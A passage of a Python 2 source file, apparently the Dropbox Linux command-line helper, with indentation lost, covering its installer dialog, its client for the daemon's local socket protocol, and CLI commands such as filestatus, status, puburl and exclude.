xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff
\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00', gtk.gdk.COLORSPACE_RGB, True, 8, 64, 64, 256)
window_icon = gtk.gdk.pixbuf_new_from_data('\x00\\\x9e\x00\x00\\\x9e\x00\x00^\xa0\x00\x00V\x99\x00\x00L\x91g\x00N\x93q\x00X\x9c\x00\x00^\x9f\x00\x00]\x9f\x00\x00Y\x9c\x00\x00P\x94o\x00M\x92i\x00V\x99\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00^\xa0\x00\x00T\x97\x00\x00F\x8c_1\x81\xba\xff+|\xb6\xff\x00F\x8e?\x00\\\x9e\x00\x00\\\x9e\x00\x00J\x8e;$y\xb6\xff-\x7f\xbc\xff\x00E\x8cb\x00R\x97\x00\x00^\xa0\x00\x00\\\x9e\x00\x00[\x9d\x00\x00I\x8c*\x05X\x9b\xc0P\x9b\xd5\xff\xa7\xdd\xff\xff\xbb\xe5\xff\xff@\x86\xbb\xff\x00>\x89D\x00D\x89B\'{\xbb\xff\x89\xcf\xff\xff\xa2\xdb\xff\xffg\xa6\xd5\xff\x07Y\x9b\xc3\x00C\x8c,\x00[\x9d\x00\x05\\\x9e\x971\x84\xc5\xffk\xbb\xf6\xff\x8e\xd0\xff\xff\x86\xc3\xf0\xff\xa2\xd2\xf5\xff\xc4\xe7\xff\xffP\x90\xc0\xff\x15u\xbf\xfff\xbf\xff\xffx\xc1\xf6\xff\x80\xc0\xf0\xff\xb0\xdf\xff\xff\xa9\xd7\xf6\xff\\\x97\xc5\xff\x0b]\x9e\x98\x08[\x9e\xdcX\xb0\xf0\xff\x84\xd0\xff\xffx\xbc\xf0\xff\x83\xc2\xf0\xff\x88\xc3\xee\xff\xb1\xd7\xf3\xff\xf9\xff\xff\xff\xca\xec\xff\xffm\xba\xf3\xffX\xae\xee\xff{\xbe\xf0\xff\x91\xc7\xf0\xff\xd2\xf2\xff\xff\xa6\xd4\xf0\xff\x11]\x9e\xde\x00T\x96\x00\x00N\x91\x9eD\x98\xd5\xff\x84\xc9\xfc\xff\x85\xc3\xf1\xff\xb7\xdb\xf6\xff\xe9\xf4\xfc\xff\xe9\xf5\xfd\xff\xdb\xee\xfd\xff\xdf\xef\xfc\xff\xa8\xd5\xf6\xff|\xbf\xf1\xff\xa3\xd6\xfc\xffl\xaa\xd6\xff\x00J\x91\xa1\x00Q\x96\x00\x00^\xa0\x00\x00T\x97\x00\x008\x7f\x9eC\x94\xd1\xff\xde\xf6\xff\xff\xf5\xfc\xff\xff\xe0\xef\xfb\xff\xe0\xf0\xfb\xff\xc8\xe5\xfb\xff\xcf\xe7\xfb\xff\xff\xff\xff\xff\xfe\xff\xff\xffV\x9d\xd2\xff\x002\x80\xa2\x00Q\x96\x00\x00_\xa0\x00\x00W\x99\x00\x00I\x8cq9\x89\xc3\xf1Y\xb0\xf2\xffR\xaa\xef\xff\xbc\xde\xf7\xff\xf9\xfc\xfe\xff\xe3\xf2\xfb\xff\xd3\xea\xfc\xff\xf5\xfb\xff\xff\xb7\xdb\xf7\xffd\xb1\xed\xff\x86\xc3\xf2\xffR\x93\xc4\xf3\x00D\x8du\x00T\x99\x00\x06Z\x9d\xb3I\xa0\xe0\xff\x8a\xd2\xff\xffe\xb5\xf2\xff/\x97\xe8\xffK\xa4\xe9\xff\x9c\xcd\xf0\xff\xf6\xf9\xfc\xff\xd6\xec\xfc\xffX\xab\xf0\xff\x15\x8a\xe6\xff9\x9b\xe6\xff\x8c\xc6\xf1\xff\xd1\xf0\xff\xff\x8b\xbe\xe1\xff\x0e\\\x9d\xb6\x07]\x9f\xc1D\x98\xd9\xff\x85\xcd\xff\xffm\xbc\xf9\xff;\x9d\xe9\xff^\xae\xec\xffl\xb3\xe8\xff\xb7\xd9\xf2\xffC\xa2\xef\xff\x00s\xe5\xff3\x99\xea\xffL\xa3\xe7\xff\x96\xce\xf9\xff\xc7\xeb\xff\xff\x81\xb3\xd9\xff\x10_\x9f\xc4\x00X\x9a\x00\x00H\x8bU\x1eq\xad\xeeR\xa8\xe8\xffA\xa4\xf1\xff`\xae\xea\xff\xa9\xd3\xf2\xff\xc8\xe4\xf8\xffh\xb7\xf2\xff@\xa2\xed\xff,\x95\xe8\xffQ\xaa\xef\xff|\xba\xe9\xff*u\xae\xf1\x00A\x8bX\x00V\x9a\x00\x00\\\x9e\x00\x00]\x9f\x00\x00>\x84\x0c"v\xb3\xff\x9b\xdb\xff\xff\x97\xcf\xf8\xff\xce\xe6\xf8\xff\xc5\xe1\xf7\xffe\xb5\xf1\xfft\xbc\xf0\xffu\xbe\xf5\xff\xa9\xde\xff\xff0{\xb0\xff\x00:\x85\x0f\x00]\x9f\x00\x00]\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00Y\x9c\x00\x02S\x97zH\x89\xbf\xff\xb8\xe3\xfd\xff\xe8\xfb\xff\xff\xc2\xdf\xf7\xff`\xb3\xf1\xff\x82\xcb\xff\xff\xa1\xd3\xf7\xffJ\x88\xb8\xff\x00S\x96r\x00Z\x9d\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00]\x9f\x00\x00[\x9d\x00\x00C\x8b*\x08W\x9b\xc5\x8c\xb9\xda\xff\xea\xfd\xff\xff\x80\xcb\xff\xffG\x97\xd4\xff\x03W\x99\xbc\x00E\x8d"\x00[\x9e\x00\x00]\x9f\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00_\xa0\x00\x00Q\x96\x00\x00C\x8di>\x88\xbd\xff,\x7f\xbb\xff\x00G\x8c`\x00T\x98\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00_\xa0\x00\x00R\x98\x00\x00I\x92r\x00P\x92n\x00V\x99\x00\x00^\xa0\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00', 
gtk.gdk.COLORSPACE_RGB, True, 8, 16, 16, 64)
GUI_AVAILABLE = os.environ.get("DISPLAY", '')
if GUI_AVAILABLE:
def download():
import pygtk
pygtk.require("2.0")
import gtk
import gobject
import pango
import webbrowser
gtk.gdk.threads_init()
load_serialized_images()
global FatalVisibleError
def FatalVisibleError(s):
error = gtk.MessageDialog(parent = None,
flags = gtk.DIALOG_MODAL,
type = gtk.MESSAGE_ERROR,
buttons = gtk.BUTTONS_OK,
message_format = s)
error.set_title("Error")
error.run()
gtk.main_quit()
sys.exit(-1)
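# GeneratorTask runs a generator on a worker thread and marshals every value it
# yields back onto the GTK main loop via gobject.idle_add, so the UI callbacks
# (loop_callback, on_done, on_exception) always run on the GUI thread.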
class GeneratorTask(object):
def __init__(self, generator, loop_callback, on_done=None, on_exception=None):
self.generator = generator
self.loop_callback = loop_callback
self.on_done = on_done
self.on_exception = on_exception
def _run(self, *args, **kwargs):
self._stopped = False
try:
for ret in self.generator(*args, **kwargs):
if ret is None:
ret = ()
if not isinstance(ret, tuple):
ret = (ret,)
gobject.idle_add(self.loop_callback, *ret)
if self._stopped:
thread.exit()
except Exception, ex:
print ex
if self.on_exception is not None:
gobject.idle_add(self.on_exception, ex)
else:
if self.on_done is not None:
gobject.idle_add(self.on_done)
def start(self, *args, **kwargs):
t = threading.Thread(target=self._run, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
def stop(self):
self._stopped = True
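# DownloadDialog is the GUI flavour of the installer prompt: it shows the info
# text and warning, and when OK is clicked it drives DownloadState through the
# download and unpack phases, reporting progress in a gtk.ProgressBar.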
class DownloadDialog(gtk.Dialog):
def handle_delete_event(self, wid, ev, data=None):
self.handle_cancel(wid)
def handle_dont_show_toggle(self, button, data=None):
reroll_autostart(not button.get_active())
def handle_cancel(self, button):
if self.task:
self.task.stop()
if self.download:
self.download.cancel()
gtk.main_quit()
self.user_cancelled = True
def handle_ok(self, button):
# begin download
self.ok.hide()
self.download = DownloadState()
self.label.hide()
if self.dont_show_again_align is not None:
self.dont_show_again_align.hide()
self.progress.show()
def download_progress(progress, status):
if not status:
self.task.stop()
self.update_progress(DOWNLOADING, progress)
def finished():
self.update_progress(DOWNLOADING, 1.0)
self.unpack_dropbox()
def error(ex):
FatalVisibleError(ERROR_CONNECTING)
self.update_progress(DOWNLOADING, 0)
self.task = GeneratorTask(self.download.copy_data,
download_progress,
finished, error).start()
def update_progress(self, text, fraction):
self.progress.set_text(text % int(fraction*100))
self.progress.set_fraction(fraction)
def unpack_dropbox(self):
def unpack_progress(name, i, total):
self.update_progress(UNPACKING, float(i)/total)
def finished():
self.update_progress(UNPACKING, 1.0)
gtk.main_quit()
def error(ex):
if isinstance(ex, SignatureVerifyError):
FatalVisibleError(ERROR_SIGNATURE)
else:
FatalVisibleError(ERROR_CONNECTING)
self.task = GeneratorTask(self.download.unpack,
unpack_progress,
finished, error).start()
def mouse_down(self, widget, event):
if self.hovering:
self.clicked_link = True
def mouse_up(self, widget, event):
if self.clicked_link:
webbrowser.open(LINK)
self.clicked_link = False
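# Hit-test the pointer against the label's pango layout: translate the event
# coordinates into a layout index and show a hand cursor only while the pointer
# is over the LINK substring.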
def label_motion(self, widget, event):
offx, offy = self.label.get_layout_offsets()
layout = self.label.get_layout()
index = layout.xy_to_index(int((offx+event.x)*pango.SCALE),
int((offy+event.y)*pango.SCALE))[0]
link_index = layout.get_text().find(LINK)
if index >= link_index and index < link_index+len(LINK):
self.hovering = True
self.label_box.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.HAND2))
else:
self.hovering = False
self.label_box.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW))
def __init__(self):
super(DownloadDialog, self).__init__(parent = None,
title = "Dropbox Installation")
self.download = None
self.hovering = False
self.clicked_link = False
self.user_cancelled = False
self.task = None
self.ok = ok = gtk.Button(stock=gtk.STOCK_OK)
ok.connect('clicked', self.handle_ok)
self.action_area.add(ok)
ok.show()
cancel = gtk.Button(stock=gtk.STOCK_CANCEL)
cancel.connect('clicked', self.handle_cancel)
self.action_area.add(cancel)
cancel.show()
self.connect('delete_event', self.handle_delete_event)
self.box_logo = gtk.image_new_from_pixbuf(box_logo_pixbuf)
self.box_logo.show()
self.set_icon(window_icon)
self.progress = gtk.ProgressBar()
self.progress.set_property('width-request', 300)
self.label = gtk.Label()
GPG_WARNING_MSG = (u"\n\n" + GPG_WARNING) if not gpgme else u""
self.label.set_markup('%s <span foreground="#000099" underline="single" weight="bold">%s</span>\n\n%s%s' % (INFO, LINK, WARNING, GPG_WARNING_MSG))
self.label.set_line_wrap(True)
self.label.set_property('width-request', 300)
self.label.show()
self.label_box = gtk.EventBox()
self.label_box.add(self.label)
self.label_box.connect("button-release-event", self.mouse_up)
self.label_box.connect("button-press-event", self.mouse_down)
self.label_box.connect("motion-notify-event", self.label_motion)
self.label_box.show()
def on_realize(widget):
self.label_box.add_events(gtk.gdk.POINTER_MOTION_MASK)
self.label_box.connect("realize", on_realize)
self.hbox = gtk.HBox(spacing=10)
self.hbox.set_property('border-width',10)
self.hbox.pack_start(self.box_logo, False, False)
self.hbox.pack_start(self.label_box, False, False)
self.hbox.pack_start(self.progress, False, False)
self.hbox.show()
self.vbox.add(self.hbox)
self.dont_show_again_align = None
try:
if can_reroll_autostart():
dont_show_again = gtk.CheckButton("_Don't show this again")
dont_show_again.connect('toggled', self.handle_dont_show_toggle)
dont_show_again.show()
self.dont_show_again_align = gtk.Alignment(xalign=1.0, yalign=0.0, xscale=0.0, yscale=0.0)
self.dont_show_again_align.add(dont_show_again)
self.dont_show_again_align.show()
hbox = gtk.HBox()
hbox.set_property('border-width', 10)
hbox.pack_start(self.dont_show_again_align, True, True)
hbox.show()
self.vbox.add(hbox)
self.set_resizable(False)
except:
traceback.print_exc()
self.ok.grab_focus()
dialog = DownloadDialog()
dialog.show()
gtk.main()
if dialog.user_cancelled:
raise Exception("user cancelled download!!!")
else:
def download():
global FatalVisibleError
def FatalVisibleError(s):
console_print(u"\nError: %s" % s, f=sys.stderr)
sys.exit(-1)
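# Plain-console fallback: use ANSI escape sequences to save/restore the cursor
# and erase the current line so the progress percentage can be redrawn in place
# when stdout is a tty.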
ESC = "\x1b"
save = ESC+"7"
unsave = ESC+"8"
clear = ESC+"[2J"
erase_to_start = ESC+"[1K"
write = sys.stdout.write
flush = sys.stdout.flush
last_progress = [None, None]
def setprogress(text, frac):
if last_progress == [text, frac]:
return
if sys.stdout.isatty():
write(erase_to_start)
write(unsave)
console_print(text % int(100*frac), linebreak=not sys.stdout.isatty())
if sys.stdout.isatty():
flush()
last_progress[0], last_progress[1] = text, frac
console_print()
if sys.stdout.isatty():
write(save)
flush()
console_print(u"%s %s\n" % (INFO, LINK))
GPG_WARNING_MSG = (u"\n%s" % GPG_WARNING) if not gpgme else u""
if not yes_no_question("%s%s" % (WARNING, GPG_WARNING_MSG)):
return
download = DownloadState()
try:
for progress, status in download.copy_data():
if not status:
break
setprogress(DOWNLOADING, progress)
except Exception:
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(DOWNLOADING, 1.0)
console_print()
write(save)
try:
for name, i, total in download.unpack():
setprogress(UNPACKING, float(i)/total)
except SignatureVerifyError:
FatalVisibleError(ERROR_SIGNATURE)
except Exception:
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(UNPACKING, 1.0)
console_print()
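# CommandTicker prints a small spinner to stderr every quarter second while a
# potentially slow daemon command is outstanding, and clears itself when stopped.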
class CommandTicker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
def stop(self):
self.stop_event.set()
def run(self):
ticks = ['[. ]', '[.. ]', '[...]', '[ ..]', '[ .]', '[ ]']
i = 0
first = True
while True:
self.stop_event.wait(0.25)
if self.stop_event.isSet(): break
if i == len(ticks):
first = False
i = 0
if not first:
sys.stderr.write("\r%s\r" % ticks[i])
sys.stderr.flush()
i += 1
sys.stderr.flush()
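# DropboxCommand wraps the line-oriented protocol spoken on the daemon's unix
# socket (~/.dropbox/command_socket): a request is the command name, one
# tab-separated key/value line per argument, then "done"; the reply is "ok"
# (or an error) followed by result lines, again terminated by "done".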
class DropboxCommand(object):
class CouldntConnectError(Exception): pass
class BadConnectionError(Exception): pass
class EOFError(Exception): pass
class CommandError(Exception): pass
def __init__(self, timeout=5):
self.s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.s.settimeout(timeout)
try:
self.s.connect(os.path.expanduser(u'~/.dropbox/command_socket'))
except socket.error, e:
raise DropboxCommand.CouldntConnectError()
self.f = self.s.makefile("r+", 4096)
def close(self):
self.f.close()
self.s.close()
def __readline(self):
try:
toret = self.f.readline().decode('utf8').rstrip(u"\n")
except socket.error, e:
raise DropboxCommand.BadConnectionError()
if toret == '':
raise DropboxCommand.EOFError()
else:
return toret
# attribute doesn't exist, I know what you want
def send_command(self, name, args):
self.f.write(name.encode('utf8'))
self.f.write(u"\n".encode('utf8'))
self.f.writelines((u"\t".join([k] + (list(v)
if hasattr(v, '__iter__') else
[v])) + u"\n").encode('utf8')
for k,v in args.iteritems())
self.f.write(u"done\n".encode('utf8'))
self.f.flush()
# Start a ticker
ticker_thread = CommandTicker()
ticker_thread.start()
# This is the potentially long-running call.
try:
ok = self.__readline() == u"ok"
except KeyboardInterrupt:
raise DropboxCommand.BadConnectionError("Keyboard interruption detected")
finally:
# Tell the ticker to stop.
ticker_thread.stop()
ticker_thread.join()
if ok:
toret = {}
for i in range(21):
if i == 20:
raise Exception(u"close this connection!")
line = self.__readline()
if line == u"done":
break
argval = line.split(u"\t")
toret[argval[0]] = argval[1:]
return toret
else:
problems = []
for i in range(21):
if i == 20:
raise Exception(u"close this connection!")
line = self.__readline()
if line == u"done":
break
problems.append(line)
raise DropboxCommand.CommandError(u"\n".join(problems))
# this is the hotness, auto marshalling
def __getattr__(self, name):
try:
return super(DropboxCommand, self).__getattr__(name)
except:
def __spec_command(**kw):
return self.send_command(unicode(name), kw)
self.__setattr__(name, __spec_command)
return __spec_command
commands = {}
aliases = {}
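# Registry of CLI subcommands and their aliases; the @command and @alias
# decorators below populate these dicts, and each command's docstring doubles
# as its help text.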
def command(meth):
global commands, aliases
assert meth.__doc__, "All commands need properly formatted docstrings (even %r!!)" % meth
if hasattr(meth, 'im_func'): # bound method, if we ever have one
meth = meth.im_func
commands[meth.func_name] = meth
meth_aliases = [unicode(alias) for alias in aliases.iterkeys() if aliases[alias].func_name == meth.func_name]
if meth_aliases:
meth.__doc__ += u"\nAliases: %s" % ",".join(meth_aliases)
return meth
def alias(name):
def decorator(meth):
global commands, aliases
assert name not in commands, "This alias is the name of a command."
aliases[name] = meth
return meth
return decorator
def requires_dropbox_running(meth):
def newmeth(*n, **kw):
if is_dropbox_running():
return meth(*n, **kw)
else:
console_print(u"Dropbox isn't running!")
newmeth.func_name = meth.func_name
newmeth.__doc__ = meth.__doc__
return newmeth
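# Launch ~/.dropbox-dist/dropboxd detached in its own session and poll
# is_dropbox_running() for up to 60 seconds; returns True once the daemon is up.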
def start_dropbox():
db_path = os.path.expanduser(u"~/.dropbox-dist/dropboxd").encode(sys.getfilesystemencoding())
if os.access(db_path, os.X_OK):
f = open("/dev/null", "w")
# we don't reap the child because we're gonna die anyway, let init do it
a = subprocess.Popen([db_path], preexec_fn=os.setsid, cwd=os.path.expanduser("~"),
stderr=sys.stderr, stdout=f, close_fds=True)
# in seconds
interval = 0.5
wait_for = 60
for i in xrange(int(wait_for / interval)):
if is_dropbox_running():
return True
# back off from connect for a while
time.sleep(interval)
return False
else:
return False
# Extracted and modified from the standard library's cmd.Cmd.columnize
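# columnize takes two parallel lists: `list` holds the plain strings used for
# width calculations, while `display_list` holds the (possibly color-escaped)
# strings that are actually printed, so ANSI codes don't skew the column widths.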
def columnize(list, display_list=None, display_width=None):
if not list:
console_print(u"<empty>")
return
non_unicode = [i for i in range(len(list)) if not (isinstance(list[i], unicode))]
if non_unicode:
raise TypeError, ("list[i] not a string for i in %s" %
", ".join(map(unicode, non_unicode)))
if not display_width:
d = os.popen('stty size', 'r').read().split()
if d:
display_width = int(d[1])
else:
for item in list:
console_print(item)
return
if not display_list:
display_list = list
size = len(list)
if size == 1:
console_print(display_list[0])
return
for nrows in range(1, len(list)):
ncols = (size+nrows-1) // nrows
colwidths = []
totwidth = -2
for col in range(ncols):
colwidth = 0
for row in range(nrows):
i = row + nrows*col
if i >= size:
break
x = list[i]
colwidth = max(colwidth, len(x))
colwidths.append(colwidth)
totwidth += colwidth + 2
if totwidth > display_width:
break
if totwidth <= display_width:
break
else:
nrows = len(list)
ncols = 1
colwidths = [0]
lines = []
for row in range(nrows):
texts = []
display_texts = []
for col in range(ncols):
i = row + nrows*col
if i >= size:
x = ""
y = ""
else:
x = list[i]
y = display_list[i]
texts.append(x)
display_texts.append(y)
while texts and not texts[-1]:
del texts[-1]
original_texts = texts[:]
for col in range(len(texts)):
texts[col] = texts[col].ljust(colwidths[col])
texts[col] = texts[col].replace(original_texts[col], display_texts[col])
line = u" ".join(texts)
lines.append(line)
for line in lines:
console_print(line)
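# filestatus backs both `dropbox filestatus` and `dropbox ls`; with -l it asks
# the daemon for each file's icon-overlay status and prints an ls-style,
# optionally colorized listing via columnize.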
@command
@requires_dropbox_running
@alias('stat')
def filestatus(args):
u"""get current sync status of one or more files
dropbox filestatus [-l] [-a] [FILE]...
Prints the current status of each FILE.
options:
-l --list prints out information in a format similar to ls. works best when your console supports color :)
-a --all do not ignore entries starting with .
"""
global enc
oparser = optparse.OptionParser()
oparser.add_option("-l", "--list", action="store_true", dest="list")
oparser.add_option("-a", "--all", action="store_true", dest="all")
(options, args) = oparser.parse_args(args)
try:
with closing(DropboxCommand()) as dc:
if options.list:
# Listing.
# Separate directories from files.
if len(args) == 0:
dirs, nondirs = [u"."], []
else:
dirs, nondirs = [], []
for a in args:
try:
(dirs if os.path.isdir(a) else nondirs).append(a.decode(enc))
except UnicodeDecodeError:
continue
if len(dirs) == 0 and len(nondirs) == 0:
#TODO: why?
exit(1)
dirs.sort(key=methodcaller('lower'))
nondirs.sort(key=methodcaller('lower'))
# Gets a string representation for a path.
def path_to_string(file_path):
if not os.path.exists(file_path):
path = u"%s (File doesn't exist!)" % os.path.basename(file_path)
return (path, path)
try:
status = dc.icon_overlay_file_status(path=file_path).get(u'status', [None])[0]
except DropboxCommand.CommandError, e:
path = u"%s (%s)" % (os.path.basename(file_path), e)
return (path, path)
env_term = os.environ.get('TERM','')
supports_color = (sys.stderr.isatty() and (
env_term.startswith('vt') or
env_term.startswith('linux') or
'xterm' in env_term or
'color' in env_term
)
)
# TODO: Test when you don't support color.
if not supports_color:
path = os.path.basename(file_path)
return (path, path)
if status == u"up to date":
init, cleanup = "\x1b[32;1m", "\x1b[0m"
elif status == u"syncing":
init, cleanup = "\x1b[36;1m", "\x1b[0m"
elif status == u"unsyncable":
init, cleanup = "\x1b[41;1m", "\x1b[0m"
elif status == u"selsync":
init, cleanup = "\x1b[37;1m", "\x1b[0m"
else:
init, cleanup = '', ''
path = os.path.basename(file_path)
return (path, u"%s%s%s" % (init, path, cleanup))
# Prints a directory.
def print_directory(name):
clean_paths = []
formatted_paths = []
for subname in sorted(os.listdir(name), key=methodcaller('lower')):
if type(subname) != unicode:
continue
if not options.all and subname[0] == u'.':
continue
try:
clean, formatted = path_to_string(unicode_abspath(os.path.join(name, subname)))
clean_paths.append(clean)
formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
columnize(clean_paths, formatted_paths)
try:
if len(dirs) == 1 and len(nondirs) == 0:
print_directory(dirs[0])
else:
nondir_formatted_paths = []
nondir_clean_paths = []
for name in nondirs:
try:
clean, formatted = path_to_string(unicode_abspath(name))
nondir_clean_paths.append(clean)
nondir_formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
if nondir_clean_paths:
columnize(nondir_clean_paths, nondir_formatted_paths)
if len(nondirs) == 0:
console_print(dirs[0] + u":")
print_directory(dirs[0])
dirs = dirs[1:]
for name in dirs:
console_print()
console_print(name + u":")
print_directory(name)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
else:
if len(args) == 0:
args = [name for name in sorted(os.listdir(u"."), key=methodcaller('lower')) if type(name) == unicode]
if len(args) == 0:
# Bail early if there's nothing to list to avoid crashing on indent below
console_print(u"<empty>")
return
indent = max(len(st)+1 for st in args)
for file in args:
try:
if type(file) is not unicode:
file = file.decode(enc)
fp = unicode_abspath(file)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
if not os.path.exists(fp):
console_print(u"%-*s %s" % \
(indent, file+':', "File doesn't exist"))
continue
try:
status = dc.icon_overlay_file_status(path=fp).get(u'status', [u'unknown'])[0]
console_print(u"%-*s %s" % (indent, file+':', status))
except DropboxCommand.CommandError, e:
console_print(u"%-*s %s" % (indent, file+':', e))
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def ls(args):
u"""list directory contents with current sync status
dropbox ls [FILE]...
This is an alias for filestatus -l
"""
return filestatus(["-l"] + args)
@command
@requires_dropbox_running
def puburl(args):
u"""get public url of a file in your dropbox
dropbox puburl FILE
Prints out a public url for FILE.
"""
if len(args) != 1:
console_print(puburl.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
console_print(dc.get_public_link(path=unicode_abspath(args[0].decode(sys.getfilesystemencoding()))).get(u'link', [u'No Link'])[0])
except DropboxCommand.CommandError, e:
console_print(u"Couldn't get public url: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def status(args):
u"""get current status of the dropboxd
dropbox status
Prints out the current status of the Dropbox daemon.
"""
if len(args) != 0:
console_print(status.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
lines = dc.get_dropbox_status()[u'status']
if len(lines) == 0:
console_print(u'Idle')
else:
for line in lines:
console_print(line)
except KeyError:
console_print(u"Couldn't get status: daemon isn't responding")
except DropboxCommand.CommandError, e:
console_print(u"Couldn't get status: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
def running(argv):
u"""return whether dropbox is running
dropbox running
Returns 1 if running, 0 if not running.
"""
return int(is_dropbox_running())
@command
@requires_dropbox_running
def stop(args):
u"""stop dropboxd
dropbox stop
Stops the dropbox daemon.
"""
try:
with closing(DropboxCommand()) as dc:
try:
dc.tray_action_hard_exit()
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
# returns True if the client still needs to be linked to a Dropbox account
def grab_link_url_if_necessary():
try:
with closing(DropboxCommand()) as dc:
try:
link_url = dc.needs_link().get(u"link_url", None)
if link_url is not None:
console_print(u"To link this computer to a dropbox account, visit the following url:\n%s" % link_url[0])
return True
else:
return False
except DropboxCommand.CommandError, e:
pass
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def lansync(argv):
u"""enables or disables LAN sync
dropbox lansync [y/n]
options:
y dropbox will use LAN sync (default)
n dropbox will not use LAN sync
"""
if len(argv) != 1:
console_print(lansync.__doc__, linebreak=False)
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_lansync = True
elif s.startswith('n') or s.startswith('-n'):
should_lansync = False
else:
should_lansync = None
if should_lansync is None:
console_print(lansync.__doc__,linebreak=False)
else:
with closing(DropboxCommand()) as dc:
dc.set_lan_sync(lansync='enabled' if should_lansync else 'disabled')
@command
@requires_dropbox_running
def exclude(args):
u"""ignores/excludes a directory from syncing
dropbox exclude [list]
dropbox exclude add [DIRECTORY] [DIRECTORY] ...
dropbox exclude remove [DIRECTORY] [DIRECTORY] ...
"list" prints a list of directories currently excluded from syncing.
"add" adds one or more directories to the exclusion list, then resynchronizes Dropbox.
"remove" removes one or more directories from the exclusion list, then resynchronizes Dropbox.
With no arguments, executes "list".
Any specified path must be within Dropbox.
"""
if len(args) == 0:
try:
with closing(DropboxCommand()) as dc:
try:
lines = [relpath(path) for path in dc.get_ignore_set()[u'ignore_set']]
lines.sort()
if len(lines) == 0:
console_print(u'No directories are being ignored.')
else:
console_print(u'Excluded: ')
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't get ignore set: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
elif len(args) == 1 and args[0] == u"list":
exclude([])
elif len(args) >= 2:
sub_command = args[0]
paths = args[1:]
absolute_paths = [unicode_abspath(path.decode(sys.getfilesystemencoding())) for path in paths]
if sub_command == u"add":
try:
